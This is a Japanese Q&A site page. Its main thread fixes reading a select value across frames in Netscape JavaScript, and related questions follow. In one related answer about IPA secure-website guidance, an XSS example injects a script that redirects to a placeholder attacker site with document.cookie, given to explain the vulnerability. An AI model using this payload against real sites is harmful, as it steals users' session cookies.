下のフレームにあるボタンを押して、下記のスクリプトを呼び出し
上のフレームの値を取得したいのですが、このソース,IEでは正常
に動くのですが、NetscapeではNULLって帰ってきます。
きちんと値を取ってきて欲しいのですが・・・。
どなたかご存知の方アドバイス宜しくお願いします。

<SCRIPT LANGUAGE="JavaScript">
<!--
function before_submit(point) {
  document.forms[0].hdn_MokuhyoSE.value = arent.fm_top.document.forms[0].cmb_MokuhyoSE.value;

   alert(document.forms[0].hdn_MokuhyoSE.value)

   return true;
}
//-->
</SCRIPT>

このソースは下のフレームのASPに記述しています。

A 回答 (1件)

たまコです。



HTMLの内容が記載されていないのでおそらくなんですが
「cmb_MokuhyoSE」は<select>ですか?
NNではcmb_MokuhyoSE.valueでは現在選択されているoptionの値を
取得してくれません。以下のように記述します。
#改行していますが本来1行です。繋げてくださいませ。

arent.fm_top.document.forms[0].cmb_MokuhyoSE.options[arent.fm_top.document.forms[0].cmb_MokuhyoSE.selectedIndex].value

記述が長くていやならば(^-^;
var x, y;
x = arent.fm_top.document.forms[0].cmb_MokuhyoSE.selectedIndex;
y = arent.fm_top.document.forms[0].cmb_MokuhyoSE.options[x].value;

#「arent」は「parent」の転記ミスですか?ちょっと気になったもので。

うまく行くといいんですが。がんばってください。

参考URL:http://www.shiojiri.ne.jp/~openspc/JavaScript/re …
    • good
    • 0
この回答へのお礼

たまコさんありがとうございました!!
うまく値を取得することができました。
いろいろ教えてくださってとても助かりました。
また何かあったら宜しくおねがいします。

お礼日時:2001/03/08 20:07

お探しのQ&Aが見つからない時は、教えて!gooで質問しましょう!

このQ&Aと関連する良く見られている質問

Q[JavaScript]document.myForm~認識しない!

こんばんわ。

ある申込みページを作っています(フォーム名はmyFromです)。
その中でテキストボックスやコンボボックスの名前にカンマ混じりの名前を付けています。
<INPUT type="text" name="name,15" onChange="ck('name,15');">という感じです。

JavaScriptで書かれた文字をチェックするなどする為にonChangeイベントでネームを引っ付けてイベントを起こしています(これも意味あり)。
JavaScriptでは・・・
dp1 = "document.myForm." + Tname;
として処理しています。
恐らくこのテキストを読み込むとすれば・・・
 TEXT1 = eval(dp1).text とか言う風になるんだと思いますが・・・うまく動作しません。恐らく「,」が入っているからだということはわかりますが・・・なんとかする方法はないですしょうか??
nameにカンマなど区切るのは次の処理でSQLやOracleに取り込みときに必要な情報を複数入れているためです。
なんとかいい方法をお教えください!!

こんばんわ。

ある申込みページを作っています(フォーム名はmyFromです)。
その中でテキストボックスやコンボボックスの名前にカンマ混じりの名前を付けています。
<INPUT type="text" name="name,15" onChange="ck('name,15');">という感じです。

JavaScriptで書かれた文字をチェックするなどする為にonChangeイベントでネームを引っ付けてイベントを起こしています(これも意味あり)。
JavaScriptでは・・・
dp1 = "document.myForm." + Tname;
として処理しています。
恐らくこのテキ...続きを読む

Aベストアンサー

dp1 = "document.myForm." + Tname;

dp1 = document.myForm[Tname];
にすればとりあえずOK。

でも、名前からフォーム部品を辿るくらいなら、フォーム部品のオブジェクト自身をパラメータにした方がよいです。

# 関数部
function ck(dp1) {
  処理
  :
}
# 起動部
<INPUT type="text" name="name,15" onChange="ck(this)">

という感じ。
関数内でname値が必要なら、dp1.nameで取れます。

QIEの[ツールバー]-[標準のボタン]、[アドレスバー]を消したい。

IEのツールバーの
・標準のボタン
・アドレスバー
を消す命令ってありませんか?
「Open時にダイアログ形式で開く」以外の方法を教えてください。
要は、ページ初期表示時に強制的に消したいのですが。。。

Aベストアンサー

・・・たしか、無い筈、ですねぇ。
強いて言えば、IEをキオスクモードで起動する手はありますね。

IEXPLORE -k 'ファイル名'

ですね。
目的が不明なので、役にたたないかもしれませんが(^^;

Q 要素の内

▽安全なウェブサイトの作り方
  http://www.ipa.go.jp/security/vuln/documents/website_security.pdf

><script>...</script> 要素の内容を動的に生成しない
>ウェブページに出力する<script>...</script>要素の内容が、外部からの入力に依存する形で動的に生成される場合、任意のスクリプトが埋め込まれてしまう可能性があります

・P25で上記のように書かれているのですが、理解できません(何故ここだけ動的生成してはいけないのか等)
・具体的にどのようにして埋め込まれる恐れがあるのでしょうか?
・またここで書いている内容は、下記何れを指しているのでしょうか?
・ココカラ<script>...</script>ココマデ
・<script>ココカラ...ココマデ</script>

Aベストアンサー

攻撃の容易性でしょう。

この脆弱性を付く攻撃をする際に一番苦労するのが <script> をどうやって埋め込むかです。これは入力内容のエスケープ処理で大体は塞がれてしまうのですが、<script> 要素内に直接埋めこめられるならその問題が無いので、かなり攻撃しやすいサイトとなります。

埋め込み方法ですが、以下の様な生成をするサイトの場合なら

入力内容: 太郎
出力内容: <script>alert('こんにちは太郎さん')</script>

そのサイト内で使用している cookie 内容を盗聴するために、以下のように攻撃できます。

入力内容: ');window.location='http://攻撃サイト/'+document.cookie;a=('
出力内容: <script>alert('こんにちは');window.location='http://攻撃サイト/'+document.cookie;a=('さん')</script>

引用符のエスケープ処理で塞がれるかもしれませんが、それでも対処できる余地はあります。

QIE7でdocument.styleSheets[n].addRuleがエラーに

こちらのCSSにルールを追加するスクリプト
http://bmky.net/text/note/javascript-css.html
を使い、IE7でCSSを操作しようとするとエラーを吐きます。

このスクリプトの場合、対象ブラウザはIE6.0までと書いてあるのですが、
IE7で同じようなことをしようとする場合、
どのようなコードを書けばいいのでしょうか。

ご教授お願いいたします。

Aベストアンサー

createStyleSheet()を使うとか

Q[[prototype]] =__proto__?

[[prototype]] と __proto__ は、同じ意味でしょうか?

Aベストアンサー

__proto__は非標準で実装依存なので、その点で同じではありません。

例えば、Firefoxの場合、下記ページに
__proto__ - JavaScript | MDN
https://developer.mozilla.org/ja/docs/JavaScript/Reference/Global_Objects/Object/proto
> An Object's __proto__ property references the same object as its internal [[Prototype]]
とあるので、Firefoxに関しては同じと見なせると思います。

もっとも、__proto__を実装しているブラウザはたいてい[[Prototype]]を意図して実装していると思われますし
現実的には同じものだと考えてしまっても理解する上で特に問題は無いかと思います。


人気Q&Aランキング

おすすめ情報